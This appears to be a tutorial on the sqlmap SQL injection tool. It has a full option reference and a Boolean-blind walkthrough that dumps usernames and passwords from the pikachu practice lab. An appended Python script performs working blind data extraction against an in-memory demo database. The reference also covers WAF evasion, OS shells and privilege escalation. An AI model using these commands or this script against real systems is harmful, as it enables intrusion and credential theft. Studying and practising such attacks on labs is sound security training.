Sqlmap usage: a small blind-injection experiment

Table of Contents

Introduction to sqlmap

Basic format

sqlmap detailed commands:

Options:

Target:

Request:

Enumeration:

Optimization:

Injection:

Detection:

Techniques:

Fingerprint:

Brute force:

User-defined function injection:

File system access:

Operating system access:

Windows registry access:

General:

Miscellaneous:

Blind injection experiment


Introduction to sqlmap

sqlmap supports five different injection techniques:

  • 1. Boolean-based blind injection: the result of the injected condition cannot be read directly, but whether it was true or false can be inferred from differences in the returned page.
  • 2. Time-based blind injection: the page content gives away nothing, so a conditional delay (for example a sleep() call) is injected and the response time is used to decide whether the condition held.
  • 3. Error-based injection: the page returns database error messages, and the result of the injected expression is smuggled out inside the error text.
  • 4. UNION query injection: usable when the rows of the original query are rendered in the page, so a UNION SELECT can append attacker-chosen rows to the output.
  • 5. Stacked query injection: usable when the back end executes several semicolon-separated statements in one call, so arbitrary extra statements can be appended.

Basic format

sqlmap -u "http://www.vuln.cn/post.php?id=1"

By default sqlmap tests at level 1 and tries to identify any supported DBMS.

sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --level 3

Restrict the back-end DBMS to MySQL and test at level 3 (levels run from 1 to 5; the higher the level, the more payloads and the more parameters, such as cookies and headers, are tested).

sqlmap detailed commands:

  • --is-dba whether the current database user has DBA (e.g. root) privileges
  • --dbs enumerate all databases
  • --current-db the database the web application is currently using
  • --users enumerate all database users
  • --current-user the database user the application connects as
  • --random-agent use a randomly chosen User-Agent header
  • --passwords database user password hashes
  • --proxy http://local:8080 --threads 10 route requests through a proxy (e.g. Burp) and use 10 threads to speed up retrieval
  • --time-sec=TIMESEC seconds of delay to expect from the DBMS in time-based tests (default 5)

Options:

  • --version show the program's version number and exit
  • -h, --help show this help message and exit
  • -v VERBOSE verbosity level: 0-6 (default 1)
  • Save progress and resume later:

sqlmap -u "http://url/news?id=1" --dbs -s "sqlmap.log" retrieved data is written to the given session file as the scan progresses
sqlmap -u "http://url/news?id=1" --dbs -s "sqlmap.log" running the same command again reads the session file back and resumes where it stopped (sqlmap also keeps a session automatically under its output directory; --flush-session discards it)

Target:

At least one of the following options must be given to specify the target.

  • -d DIRECT connect directly to the database (connection string, no web application in between)
  • -u URL, --url=URL target URL
  • -l LIST parse targets from a Burp or WebScarab proxy log file
  • -r REQUESTFILE load the HTTP request from a file (e.g. a request saved from Burp)
  • -g GOOGLEDORK process the results of a Google dork as target URLs
  • -c CONFIGFILE load options from an INI configuration file

Request:

These options specify how to connect to the target URL.

  • --data=DATA data string to send in the POST body
  • --cookie=COOKIE HTTP Cookie header
  • --cookie-urlencode URL-encode the generated cookie injections
  • --drop-set-cookie ignore Set-Cookie headers in responses
  • --user-agent=AGENT HTTP User-Agent header to send
  • --random-agent use a randomly selected HTTP User-Agent header
  • --referer=REFERER HTTP Referer header to send
  • --headers=HEADERS extra HTTP headers, one per line
  • --auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
  • --auth-cred=ACRED HTTP authentication credentials (username:password)
  • --auth-cert=ACERT HTTP authentication certificate (key_file,cert_file)
  • --proxy=PROXY use an HTTP proxy to connect to the target URL
  • --proxy-cred=PCRED HTTP proxy authentication credentials (username:password)
  • --ignore-proxy ignore the system's default HTTP proxy
  • --delay=DELAY delay between HTTP requests, in seconds
  • --timeout=TIMEOUT seconds to wait before a connection times out (default 30)
  • --retries=RETRIES number of retries when a connection times out (default 3)
  • --scope=SCOPE regular expression to filter targets from the supplied proxy log
  • --safe-url=SAFURL a URL to visit regularly during testing (keeps the session alive)
  • --safe-freq=SAFREQ number of test requests between two visits to the safe URL

Enumeration:

These options enumerate information about the back-end DBMS, its structure and the data in its tables. You can also run your own SQL statements.

  • -b, --banner retrieve the DBMS banner (version string)
  • --current-user retrieve the DBMS user the application connects as
  • --current-db retrieve the database the application is using
  • --is-dba detect whether the current DBMS user is a DBA
  • --users enumerate DBMS users
  • --passwords enumerate DBMS user password hashes
  • --privileges enumerate DBMS user privileges
  • --roles enumerate DBMS user roles
  • --dbs enumerate databases
  • -D DBname database to enumerate
  • -T TBLname table to enumerate (for example: -T tablename --columns)
  • --tables enumerate the tables of a database
  • --columns enumerate the columns of a table
  • --dump dump the entries of a table
  • --dump-all dump all entries of all tables
  • --search search for column(s), table(s) and/or database name(s)
  • -C COL column(s) to enumerate
  • -U USER DBMS user to enumerate
  • --exclude-sysdbs exclude system databases when enumerating tables
  • --start=LIMITSTART first query output entry to retrieve
  • --stop=LIMITSTOP last query output entry to retrieve
  • --first=FIRSTCHAR first character of the query output word to retrieve
  • --last=LASTCHAR last character of the query output word to retrieve
  • --sql-query=QUERY SQL statement to execute
  • --sql-shell prompt for an interactive SQL shell

Optimization:

These options optimize sqlmap's performance.

  • -o turn on all optimization switches
  • --predict-output predict common query output values (fewer requests)
  • --keep-alive use persistent HTTP(S) connections
  • --null-connection retrieve the page length without the actual HTTP response body
  • --threads=THREADS maximum number of concurrent HTTP(S) requests (default 1)

Injection:

These options specify which parameters to test, provide custom injection payloads and optional tamper scripts.

  • -p TESTPARAMETER parameter(s) to test
  • --dbms=DBMS force the back-end DBMS to this value
  • --os=OS force the back-end DBMS operating system to this value
  • --prefix=PREFIX string to prepend to the injection payload
  • --suffix=SUFFIX string to append to the injection payload
  • --tamper=TAMPER use the given script(s) to tamper with the injected data (e.g. to evade WAF filters)

Detection:

These options specify how to parse and compare page content from HTTP responses during blind SQL injection.

  • --level=LEVEL level of tests to perform (1-5, default 1)
  • --risk=RISK risk of tests to perform (0-3, default 1; higher risk includes OR-based and heavy queries that may modify data)
  • --string=STRING string that appears in the page when the injected condition is true
  • --regexp=REGEXP regular expression that matches the page when the injected condition is true
  • --text-only compare pages based on their text content only

Techniques:

These options tune the specific SQL injection tests.

  • --technique=TECH SQL injection techniques to test (default BEUST: Boolean, Error, Union, Stacked, Time; newer releases add Q for inline queries)
  • --time-sec=TIMESEC seconds of delay to expect from the DBMS in time-based tests (default 5)
  • --union-cols=UCOLS range of columns to test for UNION query injection
  • --union-char=UCHAR character to use when brute-forcing the number of columns

Fingerprint:

  • -f, --fingerprint perform an extensive DBMS version fingerprint

Brute force:

These options run brute-force checks, useful when the metadata tables cannot be read (e.g. MySQL < 5, which has no information_schema).

  • --common-tables check for the existence of common table names
  • --common-columns check for the existence of common column names

User-defined function injection:

These options can be used to create user-defined functions.

  • --udf-inject inject user-defined functions
  • --shared-lib=SHLIB local path of the shared library

File system access:

These options access the underlying file system of the back-end DBMS (they need file privileges on the database side, such as FILE in MySQL).

  • --file-read=RFILE read a file from the back-end DBMS file system
  • --file-write=WFILE local file to write to the back-end DBMS file system
  • --file-dest=DFILE absolute path on the back-end DBMS file system to write the file to

Operating system access:

These options access the underlying operating system of the back-end DBMS.

  • --os-cmd=OSCMD execute an operating system command
  • --os-shell prompt for an interactive operating system shell
  • --os-pwn prompt for an out-of-band shell, Meterpreter or VNC
  • --os-smbrelay one-click prompt for an OOB shell, Meterpreter or VNC (SMB relay)
  • --os-bof stored procedure buffer overflow exploitation
  • --priv-esc database process user privilege escalation
  • --msf-path=MSFPATH local path where the Metasploit Framework is installed
  • --tmp-path=TMPPATH absolute path of the remote temporary files directory

Windows registry access:

These options access the Windows registry of the back-end DBMS.

  • --reg-read read a Windows registry key value
  • --reg-add write a Windows registry key value data
  • --reg-del delete a Windows registry key value
  • --reg-key=REGKEY Windows registry key
  • --reg-value=REGVAL Windows registry key value
  • --reg-data=REGDATA Windows registry key value data
  • --reg-type=REGTYPE Windows registry key value type

General:

These options set general working parameters.

  • -t TRAFFICFILE log all HTTP traffic to a text file
  • -s SESSIONFILE save and restore all data retrieved in a session file
  • --flush-session flush the session file for the current target
  • --fresh-queries ignore query results stored in the session file
  • --eta display the estimated time of arrival for each output
  • --update update sqlmap
  • --save save the options to an INI configuration file
  • --batch never ask for user input, use the default behaviour

Miscellaneous:

  • --beep beep when a SQL injection is found
  • --check-payload offline IDS detection test of the injection payloads
  • --cleanup clean up the DBMS from sqlmap-specific UDFs and tables
  • --forms parse and test the forms on the target URL
  • --gpage=GOOGLEPAGE use Google dork results from the specified page number
  • --page-rank show the page rank (PR) of Google dork results
  • --parse-errors parse DBMS error messages from the response pages
  • --replicate replicate the dumped data into a sqlite3 database
  • --tor use the default Tor (Vidalia/Privoxy/Polipo) proxy address
  • --wizard simple wizard interface for beginner users

Reference: http://www.vuln.cn/2035

Blind injection experiment

Run the experiment against the pikachu lab's Boolean-based blind page, passing name=11 as the parameter to inject into (the submit value is the URL-encoded Chinese word for "query"). Because the page is Boolean-blind, sqlmap needs a detectable difference between the true and false responses; if it reports the parameter as not injectable, give it the true-case marker with --string, and expect a dump to take many requests (--threads helps).

Detect the injection point and fingerprint the back end: sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=%E6%9F%A5%E8%AF%A2"

View the current database: sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=%E6%9F%A5%E8%AF%A2" --current-db

View table names:

sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables

View column names: sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns

View usernames and passwords: sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password --dump
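To make the tables / columns / dump chain above concrete, here is an added example (not part of the original post, and not pikachu's or sqlmap's code) of the Boolean-based blind mechanism described as technique 1 in the introduction, which is what sqlmap automates against sqli_blind_b.php. It assumes a stand-in for the vulnerable page whose only observable is whether the looked-up username exists, backed by an in-memory SQLite table users(username, password) with constructed rows; the function names (vulnerable_page, oracle, extract) and the admin row are assumptions for the demo. SQLite's unicode() plays the role MySQL's ascii() plays in sqlmap's real payloads.

```python
import sqlite3

# --- Constructed stand-in for the vulnerable page (assumption: the lab page behaves like this) ---
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
CONN.executemany(
    "INSERT INTO users (username, password) VALUES (?, ?)",
    [("admin", "e10adc3949ba59abbe56e057f20f883e"),    # constructed sample rows
     ("pikachu", "670b14728ad9902aecba32e22fa4f6bd")],
)
CONN.commit()

REQUESTS = 0  # counts simulated HTTP requests so the cost of blind extraction is visible


def request_count() -> int:
    return REQUESTS


def vulnerable_page(name: str) -> bool:
    """Boolean-blind endpoint: the input is concatenated into the query (the bug) and the
    only thing the caller learns is whether a row came back ("hello" vs "does not exist")."""
    global REQUESTS
    REQUESTS += 1
    sql = "SELECT id FROM users WHERE username='" + name + "'"
    try:
        return CONN.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # errors are swallowed: nothing leaks through error messages


# --- Attacker side: the part sqlmap automates ---
def oracle(condition: str) -> bool:
    """'admin' exists, so the page answers true exactly when the injected condition holds.
    The trailing comment neutralises the application's closing quote."""
    return vulnerable_page(f"admin' AND ({condition}) -- ")


def extract(subquery: str, max_len: int = 64) -> str:
    """Recover the string returned by `subquery` one character at a time, using a
    binary search over the code point so each character costs about 7 requests."""
    # First find the length, also by binary search (assumes it is <= max_len).
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    result = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127  # ASCII range; widen hi for non-ASCII data
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite unicode() is the counterpart of MySQL ascii(); substr() is the same in both
            if oracle(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    # The same chain as the sqlmap commands above: table names, then a column, then a dump.
    print(extract("SELECT group_concat(name) FROM sqlite_master WHERE type='table'"))
    print(extract("SELECT group_concat(username) FROM users"))
    print(extract("SELECT password FROM users WHERE username='admin'"))
    print(request_count(), "requests")
```

The request counter is the point of the exercise: a 32-character hash costs a few hundred round trips here, which is why sqlmap's --threads, --predict-output and session file matter for blind injection, and why a well-tuned --string or --regexp (so every response is classified correctly) is what keeps the extracted data from being silently corrupted.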